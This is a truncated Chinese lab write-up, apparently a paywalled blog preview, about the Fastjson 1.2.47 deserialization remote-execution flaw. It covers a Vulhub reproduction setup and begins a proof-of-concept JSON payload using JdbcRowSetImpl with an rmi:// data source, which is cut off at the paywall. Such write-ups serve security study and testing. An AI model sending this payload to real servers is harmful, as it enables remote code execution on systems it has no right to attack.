感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规
| 说明 | 内容 |
|---|---|
| 漏洞编号 | |
| 漏洞名称 | Fastjson_1.2.47_远程执行漏洞 |
| 漏洞评级 | |
| 影响范围 | |
| 漏洞描述 | |
| 修复方案 |
1.1、漏洞描述
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令
1.2、漏洞等级
高危
1.3、影响版本
1.2.47
1.4、漏洞复现
1、基础环境
Path:Vulhub/fastjson/1.2.47-rce
启动测试环境:
sudo docker-compose up -d
访问http://your-ip:8090/即可看到一个json对象被返回

将content-type修改为application/json后可向其POST新的JSON对象,后端会利用fastjson进行解析
发送测试数据:
{
"name":"hello", "age":20}

2、漏洞检测
使用BurpSuite扩展插件FastjsonScan进行漏洞检测

POC:
{
"axin":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"is":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://s0tgwx

本文详细描述了Fastjson1.2.47版本中的远程执行漏洞,涉及漏洞描述、等级、影响范围,演示了漏洞复现、检测和利用过程,包括利用JNDI注入反弹Shell的方法。
最低0.47元/天 解锁文章
3641

被折叠的 条评论
为什么被折叠?



